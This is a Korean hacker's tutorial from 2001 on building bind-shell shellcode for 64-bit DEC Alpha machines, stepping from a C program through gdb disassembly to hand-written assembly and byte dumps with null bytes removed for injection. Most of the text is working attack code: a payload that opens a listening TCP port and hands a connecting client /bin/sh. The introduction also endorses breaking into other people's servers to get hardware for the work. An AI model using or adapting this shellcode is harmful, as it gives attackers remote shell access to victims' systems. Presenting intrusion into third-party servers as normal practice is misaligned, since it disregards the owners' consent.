======================================================================================
Title  : Hackers note for alpha bind shellcode ( Risc계열 , dec-alpha )
Author : truefinder, igrus & khdp.org (ROK)
e-mail : seo@igrus.inha.ac.kr
update : 2001/06/18, 2001/06/27
======================================================================================


목차 
0. 들어가기 전에 
1. Step by step !
step a. - Code your c line
step b. - Reduce your code for best fit
step c. - Note your data size and init value
step d. - Note stuff about used syscall & return value of them
step e. - Assemble it on your hands
step f. - Change variable region .data to stack 
step g. - Remove null byte code from your stream
step h. - Test your byte stream
2. 결론. 
3. appendix  A



0. 들어가기 전에  
----------------

한창 필자는 syrinx의 다음 코드 네임인 bacchante를 진행하고 있던 차였다.
나는 165.246.33.21/bacchante에 나열된 많은 OS의 다양한 칩에서 여러가지 쉘코드를 
짜야 했다. ( 물론, 이것이 절대 돈이 되거나 하는 것이 아니다. ) 
-참고로,  이 bacchante란 이름의 코드는 다분히 해커적인 차원에서의 프로젝트이다. 많은 국내, 
국외 개인과 팀들이 참여 하고 있으며 해외의 teso팀이란 곳에서는 심지어 우리와 비슷한 일을 
진행하고 있었다.  그 와중에 나는 그 멤버중의 하나인 caddis와 접촉했으며, 그 역시 우리와 같은 
몇가지 난관을  가지고 있었다. 여러 기종의 머신과 그에 따른 다양한 OS를 구비하기 힘든 상황이 
바로 그것이었는데, 그와 나의 최종 결론은 "hit and short time work ". 
즉, 필요한 서버를 해킹해서 원하는 작업을 수행하고 조용히 나오는 것.
가끔씩 열악한 환경의 해커들에겐 해킹을 위해 또 다른 크래킹이 필요할 때가 있다.-
  
  다행이도 내가 속한 school에 쓸 수 있는 몇개의 귀중한 시스템과 유틸리티들이 있었고,
나는 다른 머신의 쉘코드를 위한 장외 해킹은 그 시스템의 코드가 완성될때까지 보류하기로 했다.
그 머신에 대한 코드가 지금 막 완성되었고, 그러던 중 필자는 linux, solaris, bsd계열, 그리고 
몇가지 risc칩을 기반으로하는 특정 OS에서 코드를 짜면서 쉘코드를 구성하는 데에 어떤 정형화된 
방법론과 효율적인 테크닉을 발견했다.
   
원래, 이 노트는 단지 나의 작업을 수훨하게 하기위해 간단간단 메모해 놓은 것에서 부터 
시작된다. 경험으로 봐서 우리 hard study hacker들에겐 이런 실제적인 발자취가 더욱 도움이
되리라 생각되어 여과없이 발췌해 넣도록 한다.

많은 커멘트는 생략하기로 하겠다.

  
( 여기서 나는 설명을 위해 사람들이 많은 관심을 같는 64bit dec alpha머신을 채택했다. 현재는 
   이머신이 tru64라는 이름으로 바뀌었다. 그리고 school에서 제공해준 일반 학생계정으로 작업을 
   했다. 다행이 별다른 장외 서버 크래킹은  아직까지 필요없었던 셈이다. 하지만 너무나 괴롭다. )



2. Step by step !
------------------

자, 그럼 잔소리는 이제 그만 집어 치우고, 본론으로 들어가자 !
;]

<< 쉘코드를 짜는 정석 >>

step A.
   원하는 프로그램을 짠다.
   (여기서는 bindshellcode이다. )
   
step B.
   그 프로그램을 assembly하기 쉽게 간소화 한다.
   
step C. 
   변수로 이용될 스택의 사이즈와 차후 그 변수들의 초기화값을 알아둔다.
   
step D.
   각 루틴에서 사용되는 함수들을 미리 체크하고, disassemble해서 파라메터들이 
   어떻게 사용되는지 알아 둔다. 각 syscall에 따른 번호도 알아둔다.

step E.
   위의 정보에 따라 assembly 코드를 짠다.
   변수의 경우 먼저 .data섹션을 마련해 사용한다.
   차례로 각각의 함수를 짜나가면서 호출하고 리턴값을 체크해서 함수가 제대로 호출 되는지 
   확인한다.
   
step F. 
   함수 호출이 모두 성공되면, .data섹션에 있는 것을 코드의 스택으로 옮긴다.
   
step G.
   null byte을 제거 한다.
   
step H.
   test code !
   

우리는 위와 같은 일련의 방식으로 쉘코드를 짜 나갈 것이다.
필자의 경험으로 이런 절차에서 가장 효율적인 동선이 이루어 진다는 것을 알았다.



[step A.] - Code your C line 

++ bindshell.c ++


#include<stdio.h>
#include<sys/types.h>
#include<sys/socket.h>
#include<netinet/in.h>

main()
{
        int soc,cli,soc_len;
        struct sockaddr_in serv_addr;
        struct sockaddr_in cli_addr;

        if( fork() == 0 )
        {
                serv_addr.sin_family = AF_INET;
                serv_addr.sin_addr.s_addr = htonl( INADDR_ANY);
                serv_addr.sin_port = htons ( 30464 );

                soc = socket( AF_INET, SOCK_STREAM, IPPROTO_TCP);
                bind ( soc, (struct sockaddr *)&serv_addr, sizeof(serv_addr) );
                listen(soc, 1);

                soc_len = sizeof( cli_addr );
                cli = accept( soc, (struct sockaddr *)&cli_addr, &soc_len );
                dup2(cli, 0);
                dup2(cli, 1);
                dup2(cli, 2);

                execl("/bin/sh", "sh", 0);
        }
}



[step B.] - reduce your code for best fit 

4 /* oh, ohhara ! */
5
6       int soc;
7       int cli;
8       struct sockaddr_in serv_addr;
9
10      int main()
11      {
12      //        if( fork() == 0 )
13       //       {
14                      serv_addr.sin_family  = 2;
15                      serv_addr.sin_addr.s_addr = 0;
16                      serv_addr.sin_port = 0x77;
17        
18                      soc = socket ( 2, 1, 6 );
19                      bind ( soc, (struct sockaddr *)&serv_addr, 0x10 );
20                      listen(soc,1);
21                      cli = accept(soc,0,0);
22                      
23                      dup2(cli,0);
24                      dup2(cli,1);
25                      dup2(cli,2);
26
27                      execl("/bin/sh", "sh", 0);
28        //      }
29      }
30



[step C.] - note your data size & init value

dec-alpha의 int 는 8byte, 변수 soc과 cli 는 8byte + 8byte = 16 byte
serv_addr의 사이즈는 16 byte, 따라서 총 32 byte가 필요하다.
(gdb) x/16bx &soc  
0x1400090e0 <soc>:      0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0x1400090e8 <cli>:      0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
(gdb) x/16bx &serv_addr
0x140009f10 <serv_addr>:        0x02    0x00    0x77    0x00    0x00    0x00    0x00    0x00
0x140009f18 <serv_addr+8>:      0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00



[step D.] - note stuff about used syscall & return value of them 

여기서는 socket, bind, listen, accept, dup2, execve정도가 사용된다.
각각의 함수호출시 정상적인 동작의 경우 return값은 아래와 같다.
dec-alpha에서는 v0레지스터 , 즉 $0에 리턴값이 저장된다. 이를 통해 어셈블리상에서 
함수 호출이 제대로 이루어 졌는가를 확인할수 있다.

socket ( nonnegative integer )
bind   ( 0 )
listen ( 0 )
accept ( nonnegative integer )
dup2   ( new file desc )
execve ( no care )


GNU gdb 5.0
Copyright 2000 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "alphaev5-dec-osf4.0d"... 
(gdb) disas main
Dump of assembler code for function main:
0x120003090 <main>:     ldah    gp,8193(t12)
0x120003094 <main+4>:   lda     gp,-11264(gp)
0x120003098 <main+8>:   lda     sp,-16(sp)
0x12000309c <main+12>:  stq     ra,0(sp)
0x1200030a0 <main+16>:  stq     fp,8(sp)
0x1200030a4 <main+20>:  mov     sp,fp
0x1200030a8 <main+24>:  lda     t0,-25984(gp)
0x1200030ac <main+28>:  mov     0x2,t1
0x1200030b0 <main+32>:  ldl     t2,0(t0)
0x1200030b4 <main+36>:  zapnot  t2,0xfc,t2
0x1200030b8 <main+40>:  inswl   t1,0,t1
0x1200030bc <main+44>:  or      t1,t2,t1
0x1200030c0 <main+48>:  stl     t1,0(t0)
0x1200030c4 <main+52>:  lda     t0,-25984(gp)
0x1200030c8 <main+56>:  stl     zero,4(t0)
0x1200030cc <main+60>:  lda     t0,-25984(gp)
0x1200030d0 <main+64>:  mov     0x77,t1
0x1200030d4 <main+68>:  ldl     t2,0(t0)
0x1200030d8 <main+72>:  zapnot  t2,0xf3,t2
0x1200030dc <main+76>:  inswl   t1,0x2,t1
0x1200030e0 <main+80>:  or      t1,t2,t1
0x1200030e4 <main+84>:  stl     t1,0(t0)
0x1200030e8 <main+88>:  mov     0x2,a0
0x1200030ec <main+92>:  mov     0x1,a1
0x1200030f0 <main+96>:  mov     0x6,a2
0x1200030f4 <main+100>: ldq     t12,-32664(gp)
0x1200030f8 <main+104>: bsr     ra,0x120003490 <socket>
0x1200030fc <main+108>: ldah    gp,8193(ra)
0x120003100 <main+112>: lda     gp,-11372(gp)
0x120003104 <main+116>: mov     v0,t0
0x120003108 <main+120>: lda     t1,-29616(gp)
0x12000310c <main+124>: stl     t0,0(t1)
0x120003110 <main+128>: lda     t0,-29616(gp)
0x120003114 <main+132>: ldl     t1,0(t0)
0x120003118 <main+136>: mov     t1,a0
0x12000311c <main+140>: lda     a1,-25984(gp)
0x120003120 <main+144>: mov     0x10,a2
0x120003124 <main+148>: ldq     t12,-32648(gp)
0x120003128 <main+152>: bsr     ra,0x1200034d0 <bind>
0x12000312c <main+156>: ldah    gp,8193(ra)
0x120003130 <main+160>: lda     gp,-11420(gp)
0x120003134 <main+164>: lda     t0,-29616(gp)
0x120003138 <main+168>: ldl     t1,0(t0)
0x12000313c <main+172>: mov     t1,a0
0x120003140 <main+176>: mov     0x1,a1
0x120003144 <main+180>: ldq     t12,-32640(gp)
0x120003148 <main+184>: bsr     ra,0x120003510 <listen>
0x12000314c <main+188>: ldah    gp,8193(ra)
0x120003150 <main+192>: lda     gp,-11452(gp)
0x120003154 <main+196>: lda     t0,-29616(gp)
0x120003158 <main+200>: ldl     t1,0(t0)
0x12000315c <main+204>: mov     t1,a0
0x120003160 <main+208>: clr     a1
0x120003164 <main+212>: clr     a2
0x120003168 <main+216>: ldq     t12,-32632(gp)
0x12000316c <main+220>: bsr     ra,0x120003550 <accept>
0x120003170 <main+224>: ldah    gp,8193(ra)
0x120003174 <main+228>: lda     gp,-11488(gp)
0x120003178 <main+232>: mov     v0,t0
0x12000317c <main+236>: lda     t1,-29608(gp)
0x120003180 <main+240>: stl     t0,0(t1)
0x120003184 <main+244>: lda     t0,-29608(gp)
0x120003188 <main+248>: ldl     t1,0(t0)
0x12000318c <main+252>: mov     t1,a0
0x120003190 <main+256>: clr     a1
0x120003194 <main+260>: ldq     t12,-32616(gp)
0x120003198 <main+264>: bsr     ra,0x120003590 <dup2>
0x12000319c <main+268>: ldah    gp,8193(ra)
0x1200031a0 <main+272>: lda     gp,-11532(gp)
0x1200031a4 <main+276>: lda     t0,-29608(gp)
0x1200031a8 <main+280>: ldl     t1,0(t0)
0x1200031ac <main+284>: mov     t1,a0
0x1200031b0 <main+288>: mov     0x1,a1
0x1200031b4 <main+292>: ldq     t12,-32616(gp)
0x1200031b8 <main+296>: bsr     ra,0x120003590 <dup2>
0x1200031bc <main+300>: ldah    gp,8193(ra)
0x1200031c0 <main+304>: lda     gp,-11564(gp)
0x1200031c4 <main+308>: lda     t0,-29608(gp)
0x1200031c8 <main+312>: ldl     t1,0(t0)
0x1200031cc <main+316>: mov     t1,a0
0x1200031d0 <main+320>: mov     0x2,a1
0x1200031d4 <main+324>: ldq     t12,-32616(gp)
0x1200031d8 <main+328>: bsr     ra,0x120003590 <dup2>
0x1200031dc <main+332>: ldah    gp,8193(ra)
0x1200031e0 <main+336>: lda     gp,-11596(gp)
0x1200031e4 <main+340>: ldah    a0,-8193(gp)
0x1200031e8 <main+344>: lda     a0,11000(a0)
0x1200031ec <main+348>: ldah    a1,-8193(gp)
0x1200031f0 <main+352>: lda     a1,11008(a1)
0x1200031f4 <main+356>: clr     a2
0x1200031f8 <main+360>: ldq     t12,-32600(gp)
0x1200031fc <main+364>: bsr     ra,0x1200035d0 <execl>
0x120003200 <main+368>: ldah    gp,8193(ra)
0x120003204 <main+372>: lda     gp,-11632(gp)
0x120003208 <main+376>: mov     fp,sp
0x12000320c <main+380>: ldq     ra,0(sp)
0x120003210 <main+384>: ldq     fp,8(sp)
0x120003214 <main+388>: addq    sp,0x10,sp
0x120003218 <main+392>: ret     zero,(ra),0x1
End of assembler dump.

(gdb) disas socket
Dump of assembler code for function socket:
0x120003490 <socket>:   addq    zero,0x61,v0
0x120003494 <socket+4>: callsys
0x120003498 <socket+8>: beq     a3,0x1200034b0 <socket+32>
0x12000349c <socket+12>:        br      gp,0x1200034a0 <socket+16>
0x1200034a0 <socket+16>:        ldah    gp,8193(gp)
0x1200034a4 <socket+20>:        lda     gp,-12304(gp)
0x1200034a8 <socket+24>:        ldq     at,-32480(gp)
0x1200034ac <socket+28>:        bsr     zero,0x12000abf0 <_cerror>
0x1200034b0 <socket+32>:        ret     zero,(ra),0x1
0x1200034b4 <socket+36>:        nop
0x1200034b8 <socket+40>:        unop
0x1200034bc <socket+44>:        nop
0x1200034c0 <socket+48>:        nop
0x1200034c4 <socket+52>:        unop
0x1200034c8 <socket+56>:        nop
0x1200034cc <socket+60>:        unop
End of assembler dump.
(gdb) disas bind
Dump of assembler code for function bind:
0x1200034d0 <bind>:     addq    zero,0x68,v0
0x1200034d4 <bind+4>:   callsys
0x1200034d8 <bind+8>:   beq     a3,0x1200034f0 <bind+32>
0x1200034dc <bind+12>:  br      gp,0x1200034e0 <bind+16>
0x1200034e0 <bind+16>:  ldah    gp,8193(gp)
0x1200034e4 <bind+20>:  lda     gp,-12368(gp)
0x1200034e8 <bind+24>:  ldq     at,-32464(gp)
0x1200034ec <bind+28>:  bsr     zero,0x12000abf0 <_cerror>
0x1200034f0 <bind+32>:  ret     zero,(ra),0x1
0x1200034f4 <bind+36>:  nop
0x1200034f8 <bind+40>:  unop
0x1200034fc <bind+44>:  nop
0x120003500 <bind+48>:  nop
0x120003504 <bind+52>:  unop
0x120003508 <bind+56>:  nop
0x12000350c <bind+60>:  unop
End of assembler dump.
(gdb) disas listen
Dump of assembler code for function listen:
0x120003510 <listen>:   addq    zero,0x6a,v0
0x120003514 <listen+4>: callsys
0x120003518 <listen+8>: beq     a3,0x120003530 <listen+32>
0x12000351c <listen+12>:        br      gp,0x120003520 <listen+16>
0x120003520 <listen+16>:        ldah    gp,8193(gp)
0x120003524 <listen+20>:        lda     gp,-12432(gp)
0x120003528 <listen+24>:        ldq     at,-32448(gp)
0x12000352c <listen+28>:        bsr     zero,0x12000abf0 <_cerror>
0x120003530 <listen+32>:        ret     zero,(ra),0x1
0x120003534 <listen+36>:        nop
0x120003538 <listen+40>:        unop
0x12000353c <listen+44>:        nop
0x120003540 <listen+48>:        nop
0x120003544 <listen+52>:        unop
0x120003548 <listen+56>:        nop
0x12000354c <listen+60>:        unop
End of assembler dump.
(gdb) disas accept
Dump of assembler code for function accept:
0x120003550 <accept>:   addq    zero,0x63,v0
0x120003554 <accept+4>: callsys
0x120003558 <accept+8>: beq     a3,0x120003570 <accept+32>
0x12000355c <accept+12>:        br      gp,0x120003560 <accept+16>
0x120003560 <accept+16>:        ldah    gp,8193(gp)
0x120003564 <accept+20>:        lda     gp,-12496(gp)
0x120003568 <accept+24>:        ldq     at,-32432(gp)
0x12000356c <accept+28>:        bsr     zero,0x12000abf0 <_cerror>
0x120003570 <accept+32>:        ret     zero,(ra),0x1
0x120003574 <accept+36>:        nop
0x120003578 <accept+40>:        unop
0x12000357c <accept+44>:        nop
0x120003580 <accept+48>:        nop
0x120003584 <accept+52>:        unop
0x120003588 <accept+56>:        nop
0x12000358c <accept+60>:        unop
End of assembler dump.
(gdb) disas dup2
Dump of assembler code for function dup2:
0x120003590 <dup2>:     addq    zero,0x5a,v0
0x120003594 <dup2+4>:   callsys
0x120003598 <dup2+8>:   beq     a3,0x1200035b0 <dup2+32>
0x12000359c <dup2+12>:  br      gp,0x1200035a0 <dup2+16>
0x1200035a0 <dup2+16>:  ldah    gp,8193(gp)
0x1200035a4 <dup2+20>:  lda     gp,-12560(gp)
0x1200035a8 <dup2+24>:  ldq     at,-32416(gp)
0x1200035ac <dup2+28>:  bsr     zero,0x12000abf0 <_cerror>
0x1200035b0 <dup2+32>:  ret     zero,(ra),0x1
0x1200035b4 <dup2+36>:  nop
0x1200035b8 <dup2+40>:  unop
0x1200035bc <dup2+44>:  nop
0x1200035c0 <dup2+48>:  nop
0x1200035c4 <dup2+52>:  unop
0x1200035c8 <dup2+56>:  nop
0x1200035cc <dup2+60>:  unop
End of assembler dump.


각각의 syscall에  따른 파라메터와 syscall number는  다음과 같다.
dec-alpha의 파라메터들은 차례로 a0, a1, a2....순으로 들어가며, 스택은 참조하지 않는다.
시스템콜 번호는 $0에 들어 가며 이는 나중에 return value가 들어가서 나온다.

socket ( a0=2, a1=1, a2=6 ) $0=0x61
bind ( a0=soc, a1=&serv_addr , a2=0x10 ) $0=0x68
listen ( a0=soc, a1=1 ) $0=6a
accept ( a0=soc, a1=0, a2=0 )  $0=63
dup2( a0=&cli, a1=0) $0=5a
dup2( a0=&cli, a1=1);
dup2( a0=&cli, a1=2);




[step E.] - assemble it on your hands

그러면 이를 일단, assembly로 짜 보자.

======================= here we are, the first code ====================

.data
soc:
        .quad 0x0
cli:
        .quad 0x0
serv_addr:
        .long 0x00770002
        .long 0x00000000

.text
        .globl main
        .ent main
main :

socket_start:
        addq $31, 0x2, $16
        addq $31, 0x1, $17
        addq $31, 0x6, $18
        addq $31, 0x61, $0
        call_pal 0x83
        stq $0, soc

bind_start:
        ldq $16, soc
        lda $17, serv_addr
        addq $31,0x10,$18
        addq $31, 0x68, $0
        call_pal 0x83

listen_start:
        ldq $16, soc
        addq $31, 0x1, $17
        addq $31, 0x6a, $0
        call_pal 0x83

accept_start:
        ldq $16, soc
        bis $31, $31, $17
        bis $31, $31, $18
        addq $31, 0x63, $0
        call_pal 0x83
        stq $0, cli

dup2_start:
        ldq $16, cli
        bis $31,$31,$17
        addq $31, 0x5a, $0
        call_pal 0x83

        ldq $16, cli
        addq $31, 0x1,$17
        addq $31, 0x5a, $0
        call_pal 0x83

execve_start:
        subq $sp,424,$sp
        mov $sp,$fp

        mov 0x6e69622f, $1
        mov 0x68732fff, $2
        srl $2,0x08,$2
        stl $1, 400($fp)
        stl $2, 404($fp)
        stq $fp,408($fp)
        stq $31,416($fp)

        lda $16, 400($fp)
        lda $17, 408($fp)
        clr $18

        addq $31,0x83,$4
        stl $4, 424($fp)
        addq $fp,424,$5

        cmoveq $31,0x3b,$0
        jsr $31,($5),0xffff

        nop
        nop
        nop
        .end main

========================================================================

어셈블리를 짜는 것은 의외로 간단하다.
특히 alpha는 RISC계열 chip이므로 스택으로 벌짓(?)을 하는 수고를 덜수 있다.
잘 관찰해 보면 각 시스템 호출간에 상당히 유사하고, 간단한 코드들이 반복된다.
어려워 하지 말라.
곁에 alpha assembly 메뉴얼이 있으면 더더욱 좋다.

% 여기서 필자가 생략한 부분은 함수 하나를 짜놓고 테스트 하면서 리턴코드를 
   체크한 부분이다. 따라서 이 첫번째 어셈블리코드는 전체적으로 짜인것이 아니라, 
   조금씩 짜여지면서 테스트 된것이라고 볼수 있다.
   어째든 잘돌아간다...
  


[step F.] - change variable region .data to  stack

우리의 어셈블리는 그럭저럭 잘 돌아가는 것 같다.
그럼 .data로 선언한 안전한 메모리영역을 실행될 코드안에 넣기 위해 스택상으로  
옮겨보자.

우리에게 필요한 메모리 공간은 총 32byte이며,
sp-400 ~ sp-432 까지에 우리의 데이터를 넣을 것이다.

serv_addr 400($fp) ... 415($fp)
soc 416($fp) ... 423($fp)  
cli 424($fp) ... 431($fp)

%여기서 스택의 영역을 0~32까지가 아닌 400에서 432까지 잡는 것은 
  단지 나중에 null byte를 줄이기 위해서 이다.

======================= here is second code =============================


.text
        .globl main
        .ent main
main :
        lda $sp, -432($sp)
        mov $sp, $fp
        mov 0x00770002, $1
        stq $1, 400($fp)

socket_start:
        addq $31, 0x2, $16
        addq $31, 0x1, $17
        addq $31, 0x6, $18
        addq $31, 0x61, $0
        call_pal 0x83
        stq $0, 416($fp) 

bind_start: 
        ldq $16, 416($fp)
        lda $17, 400($fp)
        addq $31,0x10,$18
        addq $31, 0x68, $0
        call_pal 0x83

listen_start:
        ldq $16, 416($fp)
        addq $31, 0x1, $17
        addq $31, 0x6a, $0
        call_pal 0x83

accept_start:
        ldq $16, 416($fp)
        bis $31, $31, $17
        bis $31, $31, $18
        addq $31, 0x63, $0
        call_pal 0x83
        stq $0, 424($fp) 

dup2_start:
        ldq $16, 424($fp)
        bis $31,$31,$17
        addq $31, 0x5a, $0
        call_pal 0x83

        ldq $16, 424($fp)
        addq $31, 0x1,$17
        addq $31, 0x5a, $0
        call_pal 0x83

        lda $sp, 432($sp)


execve_start:
        subq $sp,424,$sp
        mov $sp,$fp

        mov 0x6e69622f, $1
        mov 0x68732fff, $2
        srl $2,0x08,$2
        stl $1, 400($fp)
        stl $2, 404($fp)
        stq $fp,408($fp)
        stq $31,416($fp)

        lda $16, 400($fp)
        lda $17, 408($fp)
        clr $18

        addq $31,0x83,$4
        stl $4, 424($fp)
        addq $fp,424,$5

        cmoveq $31,0x3b,$0
        jsr $31,($5),0xffff

        nop
        nop
        nop
        .end main

===========================================================

역시 잘 돌아 간다 !



[step G.] - remove null byte code !

어떤 OS에서는 스택 아트를 잘 해야 한다.
CISC경우 사용할수 있는 register가 적으므로 스택을 많이 사용해야 하는데,
RISC경우는 그러한 수고가 좀 덜어 진다.
이것 마찮가지 잘 테스트 되었으면, 이제는 널코드를 잡아야 한다.

이 코드가 주는 바이트 스트림은 아래와 같다.

0x120001100 <main>:     0x50    0xfe    0xde    0x23    0x0f    0x04    0xde    0x47
0x120001108 <main+8>:   0x77    0x00    0x3f    0x24    0x02    0x00    0x21    0x20
0x120001110 <main+16>:  0x90    0x01    0x2f    0xb4    0x10    0x54    0xe0    0x43
0x120001118 <main+24>:  0x11    0x34    0xe0    0x43    0x12    0xd4    0xe0    0x43
0x120001120 <main+32>:  0x00    0x34    0xec    0x43    0x83    0x00    0x00    0x00
0x120001128 <main+40>:  0xa0    0x01    0x0f    0xb4    0xa0    0x01    0x0f    0xa6
0x120001130 <main+48>:  0x90    0x01    0x2f    0x22    0x12    0x14    0xe2    0x43
0x120001138 <main+56>:  0x00    0x14    0xed    0x43    0x83    0x00    0x00    0x00
0x120001140 <main+64>:  0xa0    0x01    0x0f    0xa6    0x11    0x34    0xe0    0x43
0x120001148 <main+72>:  0x00    0x54    0xed    0x43    0x83    0x00    0x00    0x00
0x120001150 <main+80>:  0xa0    0x01    0x0f    0xa6    0x11    0x04    0xff    0x47
0x120001158 <main+88>:  0x12    0x04    0xff    0x47    0x00    0x74    0xec    0x43
0x120001160 <main+96>:  0x83    0x00    0x00    0x00    0xa8    0x01    0x0f    0xb4
0x120001168 <main+104>: 0xa8    0x01    0x0f    0xa6    0x11    0x04    0xff    0x47
0x120001170 <main+112>: 0x00    0x54    0xeb    0x43    0x83    0x00    0x00    0x00
0x120001178 <main+120>: 0xa8    0x01    0x0f    0xa6    0x11    0x34    0xe0    0x43
0x120001180 <main+128>: 0x00    0x54    0xeb    0x43    0x83    0x00    0x00    0x00
0x120001188 <main+136>: 0xb0    0x01    0xde    0x23    0x58    0xfe    0xde    0x23
0x120001190 <main+144>: 0x0f    0x04    0xde    0x47    0x69    0x6e    0x3f    0x24
0x120001198 <main+152>: 0x2f    0x62    0x21    0x20    0x73    0x68    0x5f    0x24
0x1200011a0 <main+160>: 0xff    0x2f    0x42    0x20    0x82    0x16    0x41    0x48
0x1200011a8 <main+168>: 0x90    0x01    0x2f    0xb0    0x94    0x01    0x4f    0xb0
0x1200011b0 <main+176>: 0x98    0x01    0xef    0xb5    0xa0    0x01    0xef    0xb7
0x1200011b8 <main+184>: 0x90    0x01    0x0f    0x22    0x98    0x01    0x2f    0x22
0x1200011c0 <main+192>: 0x12    0x04    0xff    0x47    0x04    0x74    0xf0    0x43
0x1200011c8 <main+200>: 0xa8    0x01    0x8f    0xb0    0xa8    0x01    0xaf    0x20
0x1200011d0 <main+208>: 0x80    0x74    0xe7    0x47    0xff    0x7f    0xe5    0x6b
0x1200011d8 <main+216>: 0x1f    0x04    0xff    0x47    0x1f    0x04    0xff    0x47
0x1200011e0 <main+224>: 0x1f    0x04    0xff    0x47

dec-alpha에서 쓰이는 call_pal 0x83 인스트럭션이 널코드를 잡는 지금 스텝에서 큰 자리를 차지하는
것으로 보인다. 대충 0x00000083으로 보이는 call_pal 0x83에 대해서 먼저 처리를 하고 보면 
드문 드문 나타나는 null들을 쉽게 잡을수 있을 듯 보인다. 

이를 위해 우리는 스택으로 쇼를 할 것이다.
기존의 코드는 자기 자신을 수정하는 식으로 많이 만들어져 왔으나, 우리에겐 충분한 스택이 있으며,
그것조차 인스트럭션이 있는 메모리로 둔갑할수 있다.  그렇다 스택에 우리의 call인스트럭션을 집어넣는 
것이다. 간단히 call계열 인스트럭션뒤에 ret 인스트럭션이 있다면 다시 우리의 excution 코드 영역으로
오는 것은 문제가 되지 않는다.

serv_addr 400($fp) ... 415($fp)
soc 416($fp) ... 423($fp)  
cli 424($fp) ... 431($fp)

serv_addr 400($fp) ... 415($fp)
soc 416($fp) ... 423($fp)  
cli 424($fp) ... 431($fp)


call_pal 0x83 432($fp) ... 435($fp) <--- call_pal 0x83
ret 436($fp) ... 439($fp) <--- ret


우리의 함수가 바로 call_pal인스트럭션이 있는 스택으로 뛰게 해야 하자 ! [ * new method]


========================= our third code here ! ==================

.text
        .globl main
        .ent main
main :
        lda $sp, -440($sp)
        mov $sp, $fp

call_pal_set_here:
        addq $31,0x83,$1
        stl $1, 432($fp)
        addq $fp,432,$10
ret_set_here:
        mov 0x6bfa8001, $1
        stl $1,436($fp)

routine_start:
var_set:
        mov 0x00770002, $1
        stq $1, 400($fp)

socket_start:
        addq $31, 0x2, $16
        addq $31, 0x1, $17
        addq $31, 0x6, $18
        addq $31, 0x61, $0
        jsr $26,($10),0xffff
        stq $0, 416($fp) 

bind_start: 
        ldq $16, 416($fp)
        lda $17, 400($fp)
        addq $31,0x10,$18
        addq $31, 0x68, $0
        jsr $26,($10),0xffff

listen_start:
        ldq $16, 416($fp)
        addq $31, 0x1, $17
        addq $31, 0x6a, $0
        jsr $26,($10),0xffff

accept_start:
        ldq $16, 416($fp)
        bis $31, $31, $17
        bis $31, $31, $18
        addq $31, 0x63, $0
        jsr $26,($10),0xffff
        stq $0, 424($fp) 

dup2_start:
        ldq $16, 424($fp)
        bis $31,$31,$17
        addq $31, 0x5a, $0
        jsr $26,($10),0xffff

        ldq $16, 424($fp)
        addq $31, 0x1,$17
        addq $31, 0x5a, $0
        jsr $26,($10),0xffff

var_release:
        lda $sp, 440($sp)


execve_start:
        subq $sp,424,$sp
        mov $sp,$fp

        mov 0x6e69622f, $1
        mov 0x68732fff, $2
        srl $2,0x08,$2
        stl $1, 400($fp)
        stl $2, 404($fp)
        stq $fp,408($fp)
        stq $31,416($fp)

        lda $16, 400($fp)
        lda $17, 408($fp)
        clr $18

start_here:
        addq $31,0x83,$4
        stl $4, 424($fp)
        addq $fp,424,$5

        cmoveq $31,0x3b,$0
        jsr $31,($10),0xffff

        nop
        nop
        nop
        .end main
        
===================================================        

우리의 코드가 다시 한번 improve되었으며,
역시 문제 없이 잘 돌아간다 !


0x120001100 <main>:     0x48    0xfe    0xde    0x23    0x0f    0x04    0xde    0x47
0x120001108 <main+8>:   0x01    0x74    0xf0    0x43    0xb0    0x01    0x2f    0xb0
0x120001110 <main+16>:  0xb0    0x01    0x4f    0x21    0xfb    0x6b    0x3f    0x24
0x120001118 <main+24>:  0x01    0x80    0x21    0x20    0xb4    0x01    0x2f    0xb0
0x120001120 <main+32>:  0x77    0x00    0x3f    0x24    0x02    0x00    0x21    0x20
0x120001128 <main+40>:  0x90    0x01    0x2f    0xb4    0x10    0x54    0xe0    0x43
0x120001130 <main+48>:  0x11    0x34    0xe0    0x43    0x12    0xd4    0xe0    0x43
0x120001138 <main+56>:  0x00    0x34    0xec    0x43    0xff    0x7f    0x4a    0x6b
0x120001140 <main+64>:  0xa0    0x01    0x0f    0xb4    0xa0    0x01    0x0f    0xa6
0x120001148 <main+72>:  0x90    0x01    0x2f    0x22    0x12    0x14    0xe2    0x43
0x120001150 <main+80>:  0x00    0x14    0xed    0x43    0xff    0x7f    0x4a    0x6b
0x120001158 <main+88>:  0xa0    0x01    0x0f    0xa6    0x11    0x34    0xe0    0x43
0x120001160 <main+96>:  0x00    0x54    0xed    0x43    0xff    0x7f    0x4a    0x6b
0x120001168 <main+104>: 0xa0    0x01    0x0f    0xa6    0x11    0x04    0xff    0x47
0x120001170 <main+112>: 0x12    0x04    0xff    0x47    0x00    0x74    0xec    0x43
0x120001178 <main+120>: 0xff    0x7f    0x4a    0x6b    0xa8    0x01    0x0f    0xb4
0x120001180 <main+128>: 0xa8    0x01    0x0f    0xa6    0x11    0x04    0xff    0x47
0x120001188 <main+136>: 0x00    0x54    0xeb    0x43    0xff    0x7f    0x4a    0x6b
0x120001190 <main+144>: 0xa8    0x01    0x0f    0xa6    0x11    0x34    0xe0    0x43
0x120001198 <main+152>: 0x00    0x54    0xeb    0x43    0xff    0x7f    0x4a    0x6b
0x1200011a0 <main+160>: 0xb8    0x01    0xde    0x23    0x58    0xfe    0xde    0x23
0x1200011a8 <main+168>: 0x0f    0x04    0xde    0x47    0x69    0x6e    0x3f    0x24
0x1200011b0 <main+176>: 0x2f    0x62    0x21    0x20    0x73    0x68    0x5f    0x24
0x1200011b8 <main+184>: 0xff    0x2f    0x42    0x20    0x82    0x16    0x41    0x48
0x1200011c0 <main+192>: 0x90    0x01    0x2f    0xb0    0x94    0x01    0x4f    0xb0
0x1200011c8 <main+200>: 0x98    0x01    0xef    0xb5    0xa0    0x01    0xef    0xb7
0x1200011d0 <main+208>: 0x90    0x01    0x0f    0x22    0x98    0x01    0x2f    0x22
0x1200011d8 <main+216>: 0x12    0x04    0xff    0x47    0x04    0x74    0xf0    0x43
0x1200011e0 <main+224>: 0xa8    0x01    0x8f    0xb0    0xa8    0x01    0xaf    0x20
